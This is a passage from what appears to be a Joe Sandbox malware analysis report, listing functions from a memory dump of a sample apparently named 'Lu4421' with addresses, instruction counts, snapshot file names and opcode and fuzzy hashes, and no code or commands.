                                                                                  • Instruction Fuzzy Hash: 2E518430E08A4C8FDB68DB58D855BE9BBF1FB59310F0082AAD04DD3252DE34A9858BC1
                                                                                  Function 00007FFD9B7FFE99 Relevance: .2, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4845528f8372e8c26c7bb9e34ae53c28b54b8a47320a236dc48a0ae5e1f1ce81
                                                                                  • Instruction ID: bf918e841421b1207cd37fe9a1b498eda42e4efa3c79019968a907bf2e1b7fa2
                                                                                  • Opcode Fuzzy Hash: 4845528f8372e8c26c7bb9e34ae53c28b54b8a47320a236dc48a0ae5e1f1ce81
                                                                                  • Instruction Fuzzy Hash: 8851BF21A0E3CA4FE36297B458355E57FE0DF47220B0A06FBD498CB0F3DD195A0A8796
                                                                                  Function 00007FFD9B7FD22D Relevance: .2, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 81e68d662c6d2e54268306e53bdfec0f2615dd766d20f64e83b776cc92476178
                                                                                  • Instruction ID: 2ce9e698829f72feebd9eef2d035cc8f5bdbb60a109e75d97a8c6c8ed2d581d8
                                                                                  • Opcode Fuzzy Hash: 81e68d662c6d2e54268306e53bdfec0f2615dd766d20f64e83b776cc92476178
                                                                                  • Instruction Fuzzy Hash: 23418030A18B1C8FDB58DF58D8456E9BBF1FF99310F04826AD449D7256DA34A845CBC2
                                                                                  Function 00007FFD9B7F3F3A Relevance: .1, Instructions: 113COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 68a3ad50a2969243dfd2f09b4f4e70ccbd1b93b178b79da2b0c6414d444a0534
                                                                                  • Instruction ID: 70d47a36aa576ed13ba301e3684d3db5c36d835dccc0fcd08955de7391496675
                                                                                  • Opcode Fuzzy Hash: 68a3ad50a2969243dfd2f09b4f4e70ccbd1b93b178b79da2b0c6414d444a0534
                                                                                  • Instruction Fuzzy Hash: 95311431A0E78D5FD7629BB48C251E97FF0EF46314B0501EFD448CB1A2DA2C1945C791
                                                                                  Function 00007FFD9B7FC4EB Relevance: .1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f241b54ae3e25b5477e03b516078a40fd98c92db595f124a3609ac04419796da
                                                                                  • Instruction ID: 2bc7c3e94c96c225ef0219f7e85aa0d9c35d1e082e20fbfd089ccec795fbe635
                                                                                  • Opcode Fuzzy Hash: f241b54ae3e25b5477e03b516078a40fd98c92db595f124a3609ac04419796da
                                                                                  • Instruction Fuzzy Hash: 8B31283060D78D4FDB45DF74C8A199ABFF1FF4A300B2442A9C499CB266CA35A846C791
                                                                                  Function 00007FFD9B7FAB90 Relevance: .1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eff020355fe46d2c29a4c14c66e4eb7468fb2c9b59badd04e1a21068622a3ba8
                                                                                  • Instruction ID: 57765e7f2489c4799d9bf7aad69b52e369f35cb55c9c03c7f5b4677aea97d391
                                                                                  • Opcode Fuzzy Hash: eff020355fe46d2c29a4c14c66e4eb7468fb2c9b59badd04e1a21068622a3ba8
                                                                                  • Instruction Fuzzy Hash: E3310823B0E7CA0FE321967858754997FA1EF51264B4907FFD088470F7E90566058386
                                                                                  Function 00007FFD9B7FBE3D Relevance: .1, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60c79ff2269e08f4bc6e25b88d1db4d9e9f978078df4621e1f8c1db313b61507
                                                                                  • Instruction ID: eb6ccb4a95709361dec369aa9c6b7194d47aad171a093eeb9fa149de5e1a3c22
                                                                                  • Opcode Fuzzy Hash: 60c79ff2269e08f4bc6e25b88d1db4d9e9f978078df4621e1f8c1db313b61507
                                                                                  • Instruction Fuzzy Hash: 0E213431A1E78D4FD7629BA89C654EC3FB1EF46210F0501FBD458C71B2EA2829468342
                                                                                  Function 00007FFD9B7F3F7E Relevance: .1, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 606f16687a0989e9e276677d42bc404ab3d88481903358d3babdf347b1e8ca19
                                                                                  • Instruction ID: e8fef19760e7a0444e812555ff1d3fc91a413431f425ebd6f566fd942562fb07
                                                                                  • Opcode Fuzzy Hash: 606f16687a0989e9e276677d42bc404ab3d88481903358d3babdf347b1e8ca19
                                                                                  • Instruction Fuzzy Hash: 4621A270A0E7895FD7629BB488295EA7FF0EF46210B0905EFD489CB1A3DA2C5845C791
                                                                                  Function 00007FFD9B7F08A9 Relevance: .1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e5a4bb5b669e63e2df923ad6bb4262dbc0651de888a14c32d7c1ef4842a74dcb
                                                                                  • Instruction ID: c95504ae12a27cfc085135d3817e068ebe9ff5ddd73b19a482b76fe9489611cd
                                                                                  • Opcode Fuzzy Hash: e5a4bb5b669e63e2df923ad6bb4262dbc0651de888a14c32d7c1ef4842a74dcb
                                                                                  • Instruction Fuzzy Hash: 9021F993B0FBCA0FE7669A7818755A87F50EF52650B0A06FFD089CF1F7E80869458391
                                                                                  Function 00007FFD9B7FFBFC Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0bc5a797d7ef8ad83b9ecc946a8ea8445c00ce7d627f1b24df29ad8ae75a0f6e
                                                                                  • Instruction ID: 44931b03587a4a31ff804720aaabac8d99cf5ea28a67fa6f025ba19479887dab
                                                                                  • Opcode Fuzzy Hash: 0bc5a797d7ef8ad83b9ecc946a8ea8445c00ce7d627f1b24df29ad8ae75a0f6e
                                                                                  • Instruction Fuzzy Hash: 9A21D330B0A60D8FD7A5EBB880656E97BD1EF45310F5105B9D80DCB2F2DD2CA940C745
                                                                                  Function 00007FFD9B800CE0 Relevance: .1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3be59e974dadee98905a3e65492a6415f2acf6fb25ef82376e76fb52032bdc1
                                                                                  • Instruction ID: d77ae8b5faea07368d5fc56a70929c09d1259d3c72e1b6d7c2c0d873fb6ff234
                                                                                  • Opcode Fuzzy Hash: d3be59e974dadee98905a3e65492a6415f2acf6fb25ef82376e76fb52032bdc1
                                                                                  • Instruction Fuzzy Hash: 3221B516F1E19E0BF369B3E861355FC56604F85769F2A82B2D49DC91EBCC0C39804266
                                                                                  Function 00007FFD9B7FC326 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a9a65e2bf80fda4bfb4288c94f762c769646156d1407011173e679e650f6fed
                                                                                  • Instruction ID: 391fae5e3c7e1ecbf77993600e435201c1b8153c4c75d1f1ce1545e2f447ef11
                                                                                  • Opcode Fuzzy Hash: 9a9a65e2bf80fda4bfb4288c94f762c769646156d1407011173e679e650f6fed
                                                                                  • Instruction Fuzzy Hash: 8F21D422F4EA9E09F7B596B408312F87EE0EF45360F4603B5C46CC20F2DD192A0A46C6
                                                                                  Function 00007FFD9B7FFF15 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c88bf666faf3331f1c1d293352b826d6405c4b8ff8164309bb1fe79a51f399a
                                                                                  • Instruction ID: f9b2165070df9216e3ea3400f3cadd107f1390517cbdeb6e0702729e5e98098e
                                                                                  • Opcode Fuzzy Hash: 7c88bf666faf3331f1c1d293352b826d6405c4b8ff8164309bb1fe79a51f399a
                                                                                  • Instruction Fuzzy Hash: B3110822F1BA9E0AF7B0966408316F97AD0EF46310F460BB6C41CC71F2DD182A0902C5
                                                                                  Function 00007FFD9B7F92B0 Relevance: .1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c541fa5fc5f6f4bd0fe0fa64eaf9ab70cbd3f903f9b867a6ad87d041482b63fb
                                                                                  • Instruction ID: ed7cf6a1e3ea27be77f3c95a50d8d5d109dce3a670e17056c13549a133037e5d
                                                                                  • Opcode Fuzzy Hash: c541fa5fc5f6f4bd0fe0fa64eaf9ab70cbd3f903f9b867a6ad87d041482b63fb
                                                                                  • Instruction Fuzzy Hash: A7212570A0D68A5FE752EBB448695EDBFE0EF06200B0405BED848DB1E7DE2C5841C795
                                                                                  Function 00007FFD9B7FAC90 Relevance: .1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a1f183256b5113751945cd55465ae3286c1f3c2d186e4b338f648e618052edb
                                                                                  • Instruction ID: 3b02656b23a9b46a4bfd56c1fe879b7dd8482664d67858d046f455b2926375cc
                                                                                  • Opcode Fuzzy Hash: 6a1f183256b5113751945cd55465ae3286c1f3c2d186e4b338f648e618052edb
                                                                                  • Instruction Fuzzy Hash: 0111D032F4EA5E09F7B4A2B408216FD79D0EF883A0F520775D42DC24F6DD192A1A05CA
                                                                                  Function 00007FFD9B7FABE8 Relevance: .1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b2c0c562da91cb05f595bf0078e2722deb473eb68b831ea98ee72dd84277a80
                                                                                  • Instruction ID: c046bd26dff56af494bb79cda126f5c7f2d3a00d6e5b5990a7a6b0c3172b2b5a
                                                                                  • Opcode Fuzzy Hash: 2b2c0c562da91cb05f595bf0078e2722deb473eb68b831ea98ee72dd84277a80
                                                                                  • Instruction Fuzzy Hash: AC110A32B1E7CD0BD725967458254D67FA1EF91324F4907BFD085870F6EC18660583C2
                                                                                  Function 00007FFD9B7FF7E9 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 16dcfba0eb4754e5c1095dcd965eb79d927ba3393ce8d3d3eb2a4bd4b49ccac8
                                                                                  • Instruction ID: 6d92799e2fd64e6839628285274dd368b279881889f1db098f7f06cc1c695c1e
                                                                                  • Opcode Fuzzy Hash: 16dcfba0eb4754e5c1095dcd965eb79d927ba3393ce8d3d3eb2a4bd4b49ccac8
                                                                                  • Instruction Fuzzy Hash: C001493230C6054FEB40EB68E4554F977D0EF5933572504BAC549DB062EA2AFC528744
                                                                                  Function 00007FFD9B7F0788 Relevance: .1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 925dcd2f175fdb9798d4fdcb76b7325ecf282e1d7ddac6656ded65be94ce9119
                                                                                  • Instruction ID: 3d6b847b8d95600f6aa158a39f3134c26508ca73dfc0d4c6cac6989ef596c9ea
                                                                                  • Opcode Fuzzy Hash: 925dcd2f175fdb9798d4fdcb76b7325ecf282e1d7ddac6656ded65be94ce9119
                                                                                  • Instruction Fuzzy Hash: 22110627A0D2DD4FD712AB646C654F87F60EF4221C74A02FBD0988B1A3EC182619C7D5
                                                                                  Function 00007FFD9B7FC29A Relevance: .1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 060c14803503acbb49ddb24730517020724ac22c8a16cc34023c52b6a693c832
                                                                                  • Instruction ID: 3ed5786b427a2f000d8044856a7069f9f354a3e4e9afb4044a9733b6dffd6986
                                                                                  • Opcode Fuzzy Hash: 060c14803503acbb49ddb24730517020724ac22c8a16cc34023c52b6a693c832
                                                                                  • Instruction Fuzzy Hash: AD114832B1E7CE0FD725967458248E67F91EF92260F4907BEE089C71F6EC14660983C2
                                                                                  Function 00007FFD9B7FFB9C Relevance: .1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7ae9fd3ad586e9bfd21175e0ecce8ff9ae400db90db4f977064144579bc353b
                                                                                  • Instruction ID: a130ab47781adf7a0b1fea343bdf832f03f75c51c81e56a94e46f78400b971bf
                                                                                  • Opcode Fuzzy Hash: d7ae9fd3ad586e9bfd21175e0ecce8ff9ae400db90db4f977064144579bc353b
                                                                                  • Instruction Fuzzy Hash: 64010831B0AA4D4FDBA167B440252EABBA1DF09251F1105B6C80CDB0F2DE2D6980C395
                                                                                  Function 00007FFD9B7F0860 Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d0d9dfbc8a4a1a491fd80022bfe56f2b1d57c629197785c8064c560188276f7d
                                                                                  • Instruction ID: d5c90229d6dee466c62b3ab6b06ced4013c572f9b6755eee334f99cb80ced5d2
                                                                                  • Opcode Fuzzy Hash: d0d9dfbc8a4a1a491fd80022bfe56f2b1d57c629197785c8064c560188276f7d
                                                                                  • Instruction Fuzzy Hash: 30F0822291F3CD4FDB135A745CA10A53F70AF03604B0A42F7E4989A1F3D9186A54C3A2
                                                                                  Function 00007FFD9B7F104D Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 16e36ee299983a05976155cdff3e5e81ee31c65416c3af5671ccad08cda919ca
                                                                                  • Instruction ID: a3de84705cb311c43ddca9a70b95c1e1831a5416821345c52641f602143d8342
                                                                                  • Opcode Fuzzy Hash: 16e36ee299983a05976155cdff3e5e81ee31c65416c3af5671ccad08cda919ca
                                                                                  • Instruction Fuzzy Hash: 9CE0C225F4980E09EB04B7B4283A9FDB255EFC4214FC20876E02DC30DBCC1D26110181
                                                                                  Function 00007FFD9B7F0F29 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef831f3d305bdca6e588f5f2632e53e9437bbe3be5ec3ca75e6d7b4d3e0fec51
                                                                                  • Instruction ID: a6ad9841ff798eaba6f65657bb6d5dea6a4076da0f1fcb32de96321ce589984a
                                                                                  • Opcode Fuzzy Hash: ef831f3d305bdca6e588f5f2632e53e9437bbe3be5ec3ca75e6d7b4d3e0fec51
                                                                                  • Instruction Fuzzy Hash: 15E09210E0E6854FE796D7B48C66B687BD0AF43204F8942E6E04CCA1E7CA5C5A50C752
                                                                                  Function 00007FFD9B801190 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25aac3d49cbdb054571cb91f202f2295fc0b739a83f226da1fb42552db6ff551
                                                                                  • Instruction ID: fdb0161aa6dfa24f9e4472cae39a80243032b598e50674f281b719b512fd2911
                                                                                  • Opcode Fuzzy Hash: 25aac3d49cbdb054571cb91f202f2295fc0b739a83f226da1fb42552db6ff551
                                                                                  • Instruction Fuzzy Hash: C7E0DF3046C3C44FC705BB3088659A57FF0EF49304F8409AAECC8C61A3CA2C8249C723
                                                                                  Function 00007FFD9B7FF42A Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23fac1ce08420eb88c6c588506b7c768d87e20478aa3945213180793d8082417
                                                                                  • Instruction ID: 96348a75d2d28182134964428ee971fafd88430b7ad43c8c2994ad0e35e187f6
                                                                                  • Opcode Fuzzy Hash: 23fac1ce08420eb88c6c588506b7c768d87e20478aa3945213180793d8082417
                                                                                  • Instruction Fuzzy Hash: 1AD02B1074A94A0FCB0426B908651F537C19F4512078800F2DC48CB2A3E80CD9CD8360
                                                                                  Function 00007FFD9B7FBAAD Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8235fe2bec13dcf765980073eb95a2af5f1c0f1934f3c65b7127be4f58134dc4
                                                                                  • Instruction ID: fa1dec7da6ed407a457a1e3717af9ee4c4aaee6d4e7335ff96bdb53073de706b
                                                                                  • Opcode Fuzzy Hash: 8235fe2bec13dcf765980073eb95a2af5f1c0f1934f3c65b7127be4f58134dc4
                                                                                  • Instruction Fuzzy Hash: 24D02B11F4990E09EB04B7B0183A9FEF266DF84300FC24475D42DC20DBCC1D250001C2
                                                                                  Function 00007FFD9B7FE15D Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cbed845b4acb17ec77cfd86d4f14a283bab66724b713d41c0cfb36233503d366
                                                                                  • Instruction ID: 8a268b70e94bd81f5b6eee71268621e5f8fc4eb9f60fe1460206c8a041234a8b
                                                                                  • Opcode Fuzzy Hash: cbed845b4acb17ec77cfd86d4f14a283bab66724b713d41c0cfb36233503d366
                                                                                  • Instruction Fuzzy Hash: CCD01225F5591E49EB54B774283A9FDB2A6DF89204FD24876D42DC20DBDD1D29010181
                                                                                  Function 00007FFD9B7F3F15 Relevance: .0, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36915abad95e9bb5914491dc8f717a630ca13e80ebf5cc755be93a7db2c3dbf7
                                                                                  • Instruction ID: a934f54de98518ada63556995a2e2143bf2c7d96a4f5a012d7b161ed8fd20d5e
                                                                                  • Opcode Fuzzy Hash: 36915abad95e9bb5914491dc8f717a630ca13e80ebf5cc755be93a7db2c3dbf7
                                                                                  • Instruction Fuzzy Hash: F5D0A731F0480D4E9F90FB9C60556FDB7E1DF88215F440033D50CD3191CD1414424381
                                                                                  Function 00007FFD9B7FF6CD Relevance: .0, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9b7069dd7b2d2cee10dfab8fb782da76b567093c36b068d9504cafdd4b3712ac
                                                                                  • Instruction ID: 7befc608a2fe3654218c2656b91bcd049dafc5ad57151da4cfa5e4d643660ce9
                                                                                  • Opcode Fuzzy Hash: 9b7069dd7b2d2cee10dfab8fb782da76b567093c36b068d9504cafdd4b3712ac
                                                                                  • Instruction Fuzzy Hash: 2CD05E22B14C490BA388EABC486932932C3DF8A338B55C334A83DD32D9DE245C021712
                                                                                  Function 00007FFD9B7F0FAA Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50747e73f40024901f0a54bdd5b7d36f5b000c61ec3249b52c5c61945a5dc641
